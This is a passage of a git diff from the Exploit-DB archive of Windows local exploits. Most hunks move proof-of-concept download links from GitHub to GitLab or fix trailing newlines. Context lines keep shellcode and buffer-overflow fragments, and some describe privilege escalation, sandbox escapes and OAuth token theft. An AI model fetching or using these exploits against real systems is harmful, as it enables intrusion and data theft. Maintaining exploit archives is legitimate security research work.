+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38287.zip \ No newline at end of file diff --git a/exploits/windows/local/38289.txt b/exploits/windows/local/38289.txt index de961ecc5..1637a0d1d 100644 --- a/exploits/windows/local/38289.txt +++ b/exploits/windows/local/38289.txt @@ -30,4 +30,4 @@ Observed Result: The service executes the file from the temporary directory and allows for elevation. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38289.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38289.zip \ No newline at end of file diff --git a/exploits/windows/local/38474.txt b/exploits/windows/local/38474.txt index 344c9b9f8..39e1fa944 100644 --- a/exploits/windows/local/38474.txt +++ b/exploits/windows/local/38474.txt @@ -49,4 +49,4 @@ The mount point is created successfully. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38474.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38474.zip \ No newline at end of file diff --git a/exploits/windows/local/38792.txt b/exploits/windows/local/38792.txt index c69a65c07..5cdecd2ce 100644 --- a/exploits/windows/local/38792.txt +++ b/exploits/windows/local/38792.txt @@ -49,4 +49,4 @@ Observed Result: A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38792.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38792.zip \ No newline at end of file diff --git a/exploits/windows/local/39310.txt b/exploits/windows/local/39310.txt index e34558c12..195e8a82f 100644 --- a/exploits/windows/local/39310.txt +++ b/exploits/windows/local/39310.txt @@ -34,4 +34,4 @@ The mount point is created successfully. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39310.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39310.zip \ No newline at end of file diff --git a/exploits/windows/local/39311.txt b/exploits/windows/local/39311.txt index f28b5b7bc..5a58050b3 100644 --- a/exploits/windows/local/39311.txt +++ b/exploits/windows/local/39311.txt @@ -41,4 +41,4 @@ The mount point is created successfully. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39311.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39311.zip \ No newline at end of file diff --git a/exploits/windows/local/39666.txt b/exploits/windows/local/39666.txt index bb570f343..170c3ee2e 100644 --- a/exploits/windows/local/39666.txt +++ b/exploits/windows/local/39666.txt @@ -7,4 +7,4 @@ EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploit Trigger and exploit code for CVE-2014-4113: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39666.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip \ No newline at end of file diff --git a/exploits/windows/local/39694.txt b/exploits/windows/local/39694.txt index 35594ab2e..2bd5541a4 100644 --- a/exploits/windows/local/39694.txt +++ b/exploits/windows/local/39694.txt @@ -45,6 +45,6 @@ POC: ========== https://smsecurity.net/wp-content/uploads/2016/04/Microsoft_Office_Excel_Out-of-Bounds_Read_RCE.xlsm -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39694.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39694.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/local/39788.txt b/exploits/windows/local/39788.txt index b3183c36e..0903a9998 100644 --- a/exploits/windows/local/39788.txt +++ b/exploits/windows/local/39788.txt @@ -22,4 +22,4 @@ SYSTEM, Proof of Concept: https://github.com/hexx0r/CVE-2016-0051 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39788.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39788.zip \ No newline at end of file diff --git a/exploits/windows/local/39804.txt b/exploits/windows/local/39804.txt index 0a675edb3..e02d7f5e8 100644 --- a/exploits/windows/local/39804.txt +++ b/exploits/windows/local/39804.txt @@ -31,7 +31,7 @@ Proof of Concept: Below you can find company file created in QB 2009 and modified to start "Notepad.exe" upon every user login (Admin, no pass). This example will work in any version including 2016 (US, CA, UK) - login procedure execution is required in order to check QB version or edition or to start update, so you will see Notepad before QB "wrong version" error message. https://www.thegrideon.com/qbint/QBFp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39804.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39804.zip Disclosure Timeline: --------------------- diff --git a/exploits/windows/local/40040.txt b/exploits/windows/local/40040.txt index d5fa63512..3eb4d9152 100644 --- a/exploits/windows/local/40040.txt +++ b/exploits/windows/local/40040.txt @@ -13,4 +13,4 @@ This code exploits 0day privileges escalation vulnerability (or backdoor?) in Sy Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40040.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip \ No newline at end of file diff --git a/exploits/windows/local/40118.txt b/exploits/windows/local/40118.txt index d242b38c7..72664d0da 100644 --- a/exploits/windows/local/40118.txt +++ b/exploits/windows/local/40118.txt @@ -14,4 +14,4 @@ http://theori.io/research/cve-2016-0189 3. Browse with a victim IE to `vbscript_bypass_pm.html`. 4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.) -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40118.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40118.zip \ No newline at end of file diff --git a/exploits/windows/local/40224.txt b/exploits/windows/local/40224.txt index c8f5989b2..05c100a7e 100644 --- a/exploits/windows/local/40224.txt +++ b/exploits/windows/local/40224.txt @@ -54,6 +54,6 @@ An attacker who successfully exploited the vulnerabilities could run arbitrary c ========== https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40224.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40224.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/local/40426.txt b/exploits/windows/local/40426.txt index 696315fcd..1dad4cbed 100644 --- a/exploits/windows/local/40426.txt +++ b/exploits/windows/local/40426.txt @@ -9,7 +9,7 @@ Full description: http://blog.rewolf.pl/blog/?p=1630 Exploit github repo: https://github.com/rwfpl/rewolf-msi-exploit EDB PoC Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40426.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40426.zip NTIOLib.sys is installed with a few different MSI utilities that are part of the software package for MSI motherboards and graphic cards. WinIO.sys is completely different driver and is installed with Dragon Gaming Center application, which is part of the software package for MSI notebooks. Since both drivers expose physical memory access to the unprivileged users, I decided to put it into one report (I’ll describe the technical differences later). Actually when I was verifying list of affected software, I’ve found third driver that is doing exactly the same thing, just have a bit different interface and name (RTCore32.sys / RTCore64.sys). diff --git a/exploits/windows/local/40655.txt b/exploits/windows/local/40655.txt index ce09e34cb..edae41ebf 100644 --- a/exploits/windows/local/40655.txt +++ b/exploits/windows/local/40655.txt @@ -11,4 +11,4 @@ A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40655.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40655.zip \ No newline at end of file diff --git a/exploits/windows/local/40660.txt b/exploits/windows/local/40660.txt index fa552e28d..e402372e0 100644 --- a/exploits/windows/local/40660.txt +++ b/exploits/windows/local/40660.txt @@ -75,4 +75,4 @@ the right UNC path) on the target machine. Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40660.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40660.zip \ No newline at end of file diff --git a/exploits/windows/local/40823.txt b/exploits/windows/local/40823.txt index 85f017cca..940d6aa27 100644 --- a/exploits/windows/local/40823.txt +++ b/exploits/windows/local/40823.txt @@ -1,5 +1,5 @@ Complete Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip Presentation: https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf diff --git a/exploits/windows/local/40848.java b/exploits/windows/local/40848.java index a95ce7b64..5dd4bfc33 100644 --- a/exploits/windows/local/40848.java +++ b/exploits/windows/local/40848.java @@ -154,4 +154,4 @@ public class WinPowerExploit { } } -// Compiled Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40848.class \ No newline at end of file +// Compiled Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40848.class \ No newline at end of file diff --git a/exploits/windows/local/41015.c b/exploits/windows/local/41015.c index e1483e909..66ad14946 100644 --- a/exploits/windows/local/41015.c +++ b/exploits/windows/local/41015.c @@ -2,7 +2,7 @@ Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41015.exe */ // ricklarabee.blogspot.com diff --git a/exploits/windows/local/41031.txt b/exploits/windows/local/41031.txt index aeb9242d6..4d21c411f 100644 --- a/exploits/windows/local/41031.txt +++ b/exploits/windows/local/41031.txt @@ -9,5 +9,4 @@ POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41031.zip - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41031.zip \ No newline at end of file diff --git a/exploits/windows/local/41144.txt b/exploits/windows/local/41144.txt index a418fcbf6..b96f6f98b 100644 --- a/exploits/windows/local/41144.txt +++ b/exploits/windows/local/41144.txt @@ -24,7 +24,7 @@ To exploit this issue: POC file that will open a java pop up when executed but any java payload will also work including the meterpreter payloads generated by metasploit. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41144.ppsx +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41144.ppsx Please note that in a fully patched version a pop up will show asking the user to run the file which is useful if you're good at social engineering ;) diff --git a/exploits/windows/local/41207.txt b/exploits/windows/local/41207.txt index 1f2d8b550..8da56808e 100644 --- a/exploits/windows/local/41207.txt +++ b/exploits/windows/local/41207.txt @@ -14,7 +14,7 @@ https://security.szurek.pl/viscosity-for-windows-167-privilege-escalation.html 2. Proof of Concept -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41207.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41207.zip 3. Solution diff --git a/exploits/windows/local/4178.txt b/exploits/windows/local/4178.txt index 41ef2db5b..9cafb0b59 100644 --- a/exploits/windows/local/4178.txt +++ b/exploits/windows/local/4178.txt @@ -3,6 +3,6 @@ Symantec AntiVirus symtdi.sys Local Privilege Escalation Author: Zohiartze Herce Site: http://48bits.com -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4178.rar (07122007-symTDI_advisory.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4178.rar (07122007-symTDI_advisory.rar) # milw0rm.com [2007-07-12] \ No newline at end of file diff --git a/exploits/windows/local/41902.txt b/exploits/windows/local/41902.txt index 06e3b43ea..947fccac4 100644 --- a/exploits/windows/local/41902.txt +++ b/exploits/windows/local/41902.txt @@ -37,4 +37,4 @@ The storage object is accessed and abused to escape the sandbox. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41902.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41902.zip \ No newline at end of file diff --git a/exploits/windows/local/41933.txt b/exploits/windows/local/41933.txt index d07c681dd..bbc02f0f0 100644 --- a/exploits/windows/local/41933.txt +++ b/exploits/windows/local/41933.txt @@ -28,4 +28,4 @@ An instance of notepad is running at system privileges. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41933.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip \ No newline at end of file diff --git a/exploits/windows/local/42077.txt b/exploits/windows/local/42077.txt index 081ddc478..66a64610b 100644 --- a/exploits/windows/local/42077.txt +++ b/exploits/windows/local/42077.txt @@ -82,4 +82,4 @@ Filename: apicall.c The password for all archives is "msmpeng" Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42077.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42077.zip \ No newline at end of file diff --git a/exploits/windows/local/42325.py b/exploits/windows/local/42325.py index 6beea03a1..4090ef7ea 100755 --- a/exploits/windows/local/42325.py +++ b/exploits/windows/local/42325.py @@ -2,7 +2,7 @@ # Counter Strike: Condition Zero BSP map exploit # By @Digital_Cold Jun 11, 2017 # -# E-DB Note: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42325.zip (bsp-exploit-source.zip) +# E-DB Note: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42325.zip (bsp-exploit-source.zip) # from binascii import hexlify, unhexlify from struct import pack, unpack diff --git a/exploits/windows/local/42385.py b/exploits/windows/local/42385.py index 9c3066a14..ba0e00ca0 100755 --- a/exploits/windows/local/42385.py +++ b/exploits/windows/local/42385.py @@ -48,4 +48,4 @@ try: file.close() raw_input("\nExploit has been created!\n") except: - print "There has been an Error" + print "There has been an Error" \ No newline at end of file diff --git a/exploits/windows/local/42425.txt b/exploits/windows/local/42425.txt index 381cfb357..f22773aec 100644 --- a/exploits/windows/local/42425.txt +++ b/exploits/windows/local/42425.txt @@ -70,4 +70,4 @@ DLL is loaded into the protected process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42425.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42425.zip \ No newline at end of file diff --git a/exploits/windows/local/42426.txt b/exploits/windows/local/42426.txt index 455762f0f..6237b8f75 100644 --- a/exploits/windows/local/42426.txt +++ b/exploits/windows/local/42426.txt @@ -52,4 +52,4 @@ DLL is loaded into the protected process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42426.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42426.zip \ No newline at end of file diff --git a/exploits/windows/local/42537.txt b/exploits/windows/local/42537.txt index 791a582b3..2e0e867ec 100644 --- a/exploits/windows/local/42537.txt +++ b/exploits/windows/local/42537.txt @@ -78,4 +78,4 @@ function New-PDFJS { } Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42537.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42537.zip \ No newline at end of file diff --git a/exploits/windows/local/42542.txt b/exploits/windows/local/42542.txt index f9165575c..f352e0cde 100644 --- a/exploits/windows/local/42542.txt +++ b/exploits/windows/local/42542.txt @@ -80,5 +80,4 @@ C:\WebCTRL6.0\WebCTRL Server.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R - NT AUTHORITY\Authenticated Users:(ID)C - + NT AUTHORITY\Authenticated Users:(ID)C \ No newline at end of file diff --git a/exploits/windows/local/42565.py b/exploits/windows/local/42565.py index b212fecb9..3899827b1 100755 --- a/exploits/windows/local/42565.py +++ b/exploits/windows/local/42565.py @@ -58,4 +58,4 @@ shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" padding = "\x44"*(1000-351) f = open ("exploit.txt", "w") f.write(buffer + nSEH + SEH + junk + shellcode + padding) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/local/42567.py b/exploits/windows/local/42567.py index 12998ca44..f25a5db1e 100755 --- a/exploits/windows/local/42567.py +++ b/exploits/windows/local/42567.py @@ -58,4 +58,4 @@ f = open ("calc.txt", "w") f.write(data) f.close() -#Greetz => Jack Carlo +#Greetz => Jack Carlo \ No newline at end of file diff --git a/exploits/windows/local/42568.py b/exploits/windows/local/42568.py index 6530b466f..aeb5bb874 100755 --- a/exploits/windows/local/42568.py +++ b/exploits/windows/local/42568.py @@ -59,4 +59,4 @@ f = open ("calc.txt", "w") f.write(data) f.close() -#Greetz => Jack Carlo +#Greetz => Jack Carlo \ No newline at end of file diff --git a/exploits/windows/local/42586.py b/exploits/windows/local/42586.py index 26265b082..b5e3f6b9b 100755 --- a/exploits/windows/local/42586.py +++ b/exploits/windows/local/42586.py @@ -55,5 +55,4 @@ data = buffer + nSEH + SEH + nops + buf f = open ("test.txt", "w") f.write(data) -f.close() - +f.close() \ No newline at end of file diff --git a/exploits/windows/local/42605.txt b/exploits/windows/local/42605.txt index 79671e577..0f1ec1d09 100644 --- a/exploits/windows/local/42605.txt +++ b/exploits/windows/local/42605.txt @@ -33,4 +33,4 @@ Also, NSD can be used to attach, kill processes or create memory dumps under the 3. Solution: -This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. +This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. \ No newline at end of file diff --git a/exploits/windows/local/42612.py b/exploits/windows/local/42612.py index 4e3bb6886..3077cd0b2 100755 --- a/exploits/windows/local/42612.py +++ b/exploits/windows/local/42612.py @@ -84,4 +84,4 @@ a = open("Dup_Scout_buffer.txt", "w") a.write(data) a.close() -#Greetz : @Pulkit +#Greetz : @Pulkit \ No newline at end of file diff --git a/exploits/windows/local/42718.rb b/exploits/windows/local/42718.rb index 3cc45aafc..cb29f0591 100755 --- a/exploits/windows/local/42718.rb +++ b/exploits/windows/local/42718.rb @@ -131,4 +131,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -__END__ +__END__ \ No newline at end of file diff --git a/exploits/windows/local/42735.c b/exploits/windows/local/42735.c index 78d382db9..160fe3b99 100644 --- a/exploits/windows/local/42735.c +++ b/exploits/windows/local/42735.c @@ -309,5 +309,4 @@ int main() exit(0); -} - +} \ No newline at end of file diff --git a/exploits/windows/local/42918.py b/exploits/windows/local/42918.py index 7a0d096db..917b7e651 100755 --- a/exploits/windows/local/42918.py +++ b/exploits/windows/local/42918.py @@ -65,4 +65,4 @@ f.close() #GREETZ ---------- #Taushif(Brother) -#----------------- +#----------------- \ No newline at end of file diff --git a/exploits/windows/local/42921.py b/exploits/windows/local/42921.py index f15da9ab0..bf6e117b8 100755 --- a/exploits/windows/local/42921.py +++ b/exploits/windows/local/42921.py @@ -61,4 +61,4 @@ file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + f = open('evil.xml', 'w') f.write(file) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/local/43033.py b/exploits/windows/local/43033.py index b769cb698..1ca276ec9 100755 --- a/exploits/windows/local/43033.py +++ b/exploits/windows/local/43033.py @@ -100,4 +100,4 @@ try: debug.loop() finally: - debug.stop() + debug.stop() \ No newline at end of file diff --git a/exploits/windows/local/43057.txt b/exploits/windows/local/43057.txt index 9995ea644..b48009794 100644 --- a/exploits/windows/local/43057.txt +++ b/exploits/windows/local/43057.txt @@ -16,4 +16,4 @@ https://trackwatch.com/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43057.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43057.zip \ No newline at end of file diff --git a/exploits/windows/local/43109.c b/exploits/windows/local/43109.c index 8703fbf58..65eb85f97 100644 --- a/exploits/windows/local/43109.c +++ b/exploits/windows/local/43109.c @@ -270,4 +270,4 @@ int main(int argc, char *argv[]) spawnShell(); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/local/43134.c b/exploits/windows/local/43134.c index 1918f34c5..4ab096a26 100644 --- a/exploits/windows/local/43134.c +++ b/exploits/windows/local/43134.c @@ -139,4 +139,4 @@ is given to the author. The author is not responsible for any misuse of the info for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/43162.txt b/exploits/windows/local/43162.txt index 9b730bfe2..3793982e2 100644 --- a/exploits/windows/local/43162.txt +++ b/exploits/windows/local/43162.txt @@ -54,4 +54,4 @@ The signing level cache is applied to the file with no further verification. You Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43162.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43162.zip \ No newline at end of file diff --git a/exploits/windows/local/43465.txt b/exploits/windows/local/43465.txt index f9a309a37..82f5d7960 100644 --- a/exploits/windows/local/43465.txt +++ b/exploits/windows/local/43465.txt @@ -43,4 +43,4 @@ Microsoft have made the decision that as the issue with NtImpersonateAnonymousTo Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43465.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43465.zip \ No newline at end of file diff --git a/exploits/windows/local/43879.txt b/exploits/windows/local/43879.txt index 0f3ea1dd2..fe17c9fa4 100644 --- a/exploits/windows/local/43879.txt +++ b/exploits/windows/local/43879.txt @@ -50,4 +50,4 @@ http://lock.cmpxchg8b.com/yah4od7N.html See screenshot attached of how it's supposed to look. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43665.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43665.zip \ No newline at end of file diff --git a/exploits/windows/local/44147.txt b/exploits/windows/local/44147.txt index 3ea600331..652d54904 100644 --- a/exploits/windows/local/44147.txt +++ b/exploits/windows/local/44147.txt @@ -30,4 +30,4 @@ The symlink is created, is valid and can be used to access the target. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44147.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44147.zip \ No newline at end of file diff --git a/exploits/windows/local/44148.txt b/exploits/windows/local/44148.txt index 28eb1e314..396f958c0 100644 --- a/exploits/windows/local/44148.txt +++ b/exploits/windows/local/44148.txt @@ -35,4 +35,4 @@ The symlink is created, is valid and the poc printed ‘Success’ as it’s ope Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44148.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44148.zip \ No newline at end of file diff --git a/exploits/windows/local/44149.txt b/exploits/windows/local/44149.txt index 0df4342e2..d085aeecf 100644 --- a/exploits/windows/local/44149.txt +++ b/exploits/windows/local/44149.txt @@ -35,4 +35,4 @@ The test binary is running while impersonating the SYSTEM token. It’s opened a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44149.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44149.zip \ No newline at end of file diff --git a/exploits/windows/local/44152.txt b/exploits/windows/local/44152.txt index 6ead60199..c10b2a95f 100644 --- a/exploits/windows/local/44152.txt +++ b/exploits/windows/local/44152.txt @@ -29,4 +29,4 @@ The file is reverted which results in the test.txt file being creating in c:\win Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44152.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44152.zip \ No newline at end of file diff --git a/exploits/windows/local/44263.md b/exploits/windows/local/44263.md index c3475a5b2..dfb2e819b 100644 --- a/exploits/windows/local/44263.md +++ b/exploits/windows/local/44263.md @@ -2,7 +2,7 @@ This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44263.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44263.zip ## Why? diff --git a/exploits/windows/local/44267.md b/exploits/windows/local/44267.md index 5020fa1b5..3082f4390 100644 --- a/exploits/windows/local/44267.md +++ b/exploits/windows/local/44267.md @@ -9,4 +9,4 @@ This is an Javascript exploit actively used against TorBrowser NOW. It consists -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44267.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44267.zip \ No newline at end of file diff --git a/exploits/windows/local/44269.txt b/exploits/windows/local/44269.txt index c705ce447..e93b10ebb 100644 --- a/exploits/windows/local/44269.txt +++ b/exploits/windows/local/44269.txt @@ -1,3 +1,3 @@ Sandbox escape Chrome exploit. Allows the execution of local binaries, read/write functions and exfiltration of Chrome OAuth tokens to remote server. More info: https://bugs.chromium.org/p/chromium/issues/detail?id=386988 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44269.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44269.zip \ No newline at end of file diff --git a/exploits/windows/local/44315.txt b/exploits/windows/local/44315.txt index ec91d32b6..aa76c89ea 100644 --- a/exploits/windows/local/44315.txt +++ b/exploits/windows/local/44315.txt @@ -26,4 +26,4 @@ The registry key is loaded and the file test.hiv has been created in the windows Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44315.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44315.zip \ No newline at end of file diff --git a/exploits/windows/local/44630.txt b/exploits/windows/local/44630.txt index e15c5c009..077cca3b7 100644 --- a/exploits/windows/local/44630.txt +++ b/exploits/windows/local/44630.txt @@ -33,4 +33,4 @@ The trust label is successfully set. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44630.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44630.zip \ No newline at end of file diff --git a/exploits/windows/local/44697.txt b/exploits/windows/local/44697.txt index 9582fbe1d..54254b962 100644 --- a/exploits/windows/local/44697.txt +++ b/exploits/windows/local/44697.txt @@ -4,4 +4,4 @@ Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsign - This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44697.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44697.zip \ No newline at end of file diff --git a/exploits/windows/local/44742.txt b/exploits/windows/local/44742.txt index a98162182..f4755e7e7 100644 --- a/exploits/windows/local/44742.txt +++ b/exploits/windows/local/44742.txt @@ -2,4 +2,4 @@ Pop up a calculator - Requires Flash ActiveX 18.0.0.194 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44742.swf +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44742.swf \ No newline at end of file diff --git a/exploits/windows/local/44744.txt b/exploits/windows/local/44744.txt index 4a9bad77f..fa5818e49 100644 --- a/exploits/windows/local/44744.txt +++ b/exploits/windows/local/44744.txt @@ -2,4 +2,4 @@ Pop up a calculator - tested with installation of flash activeX plugin 28.0.0.137 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44744.xlsx \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44744.xlsx \ No newline at end of file diff --git a/exploits/windows/local/44745.txt b/exploits/windows/local/44745.txt index 32601ce51..bff18bbb5 100644 --- a/exploits/windows/local/44745.txt +++ b/exploits/windows/local/44745.txt @@ -2,4 +2,4 @@ Pop up a calculator - Requires Flash ActiveX 28.0.0.137 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44745.swf \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44745.swf \ No newline at end of file diff --git a/exploits/windows/local/44888.txt b/exploits/windows/local/44888.txt index 31853d194..ced007eb6 100644 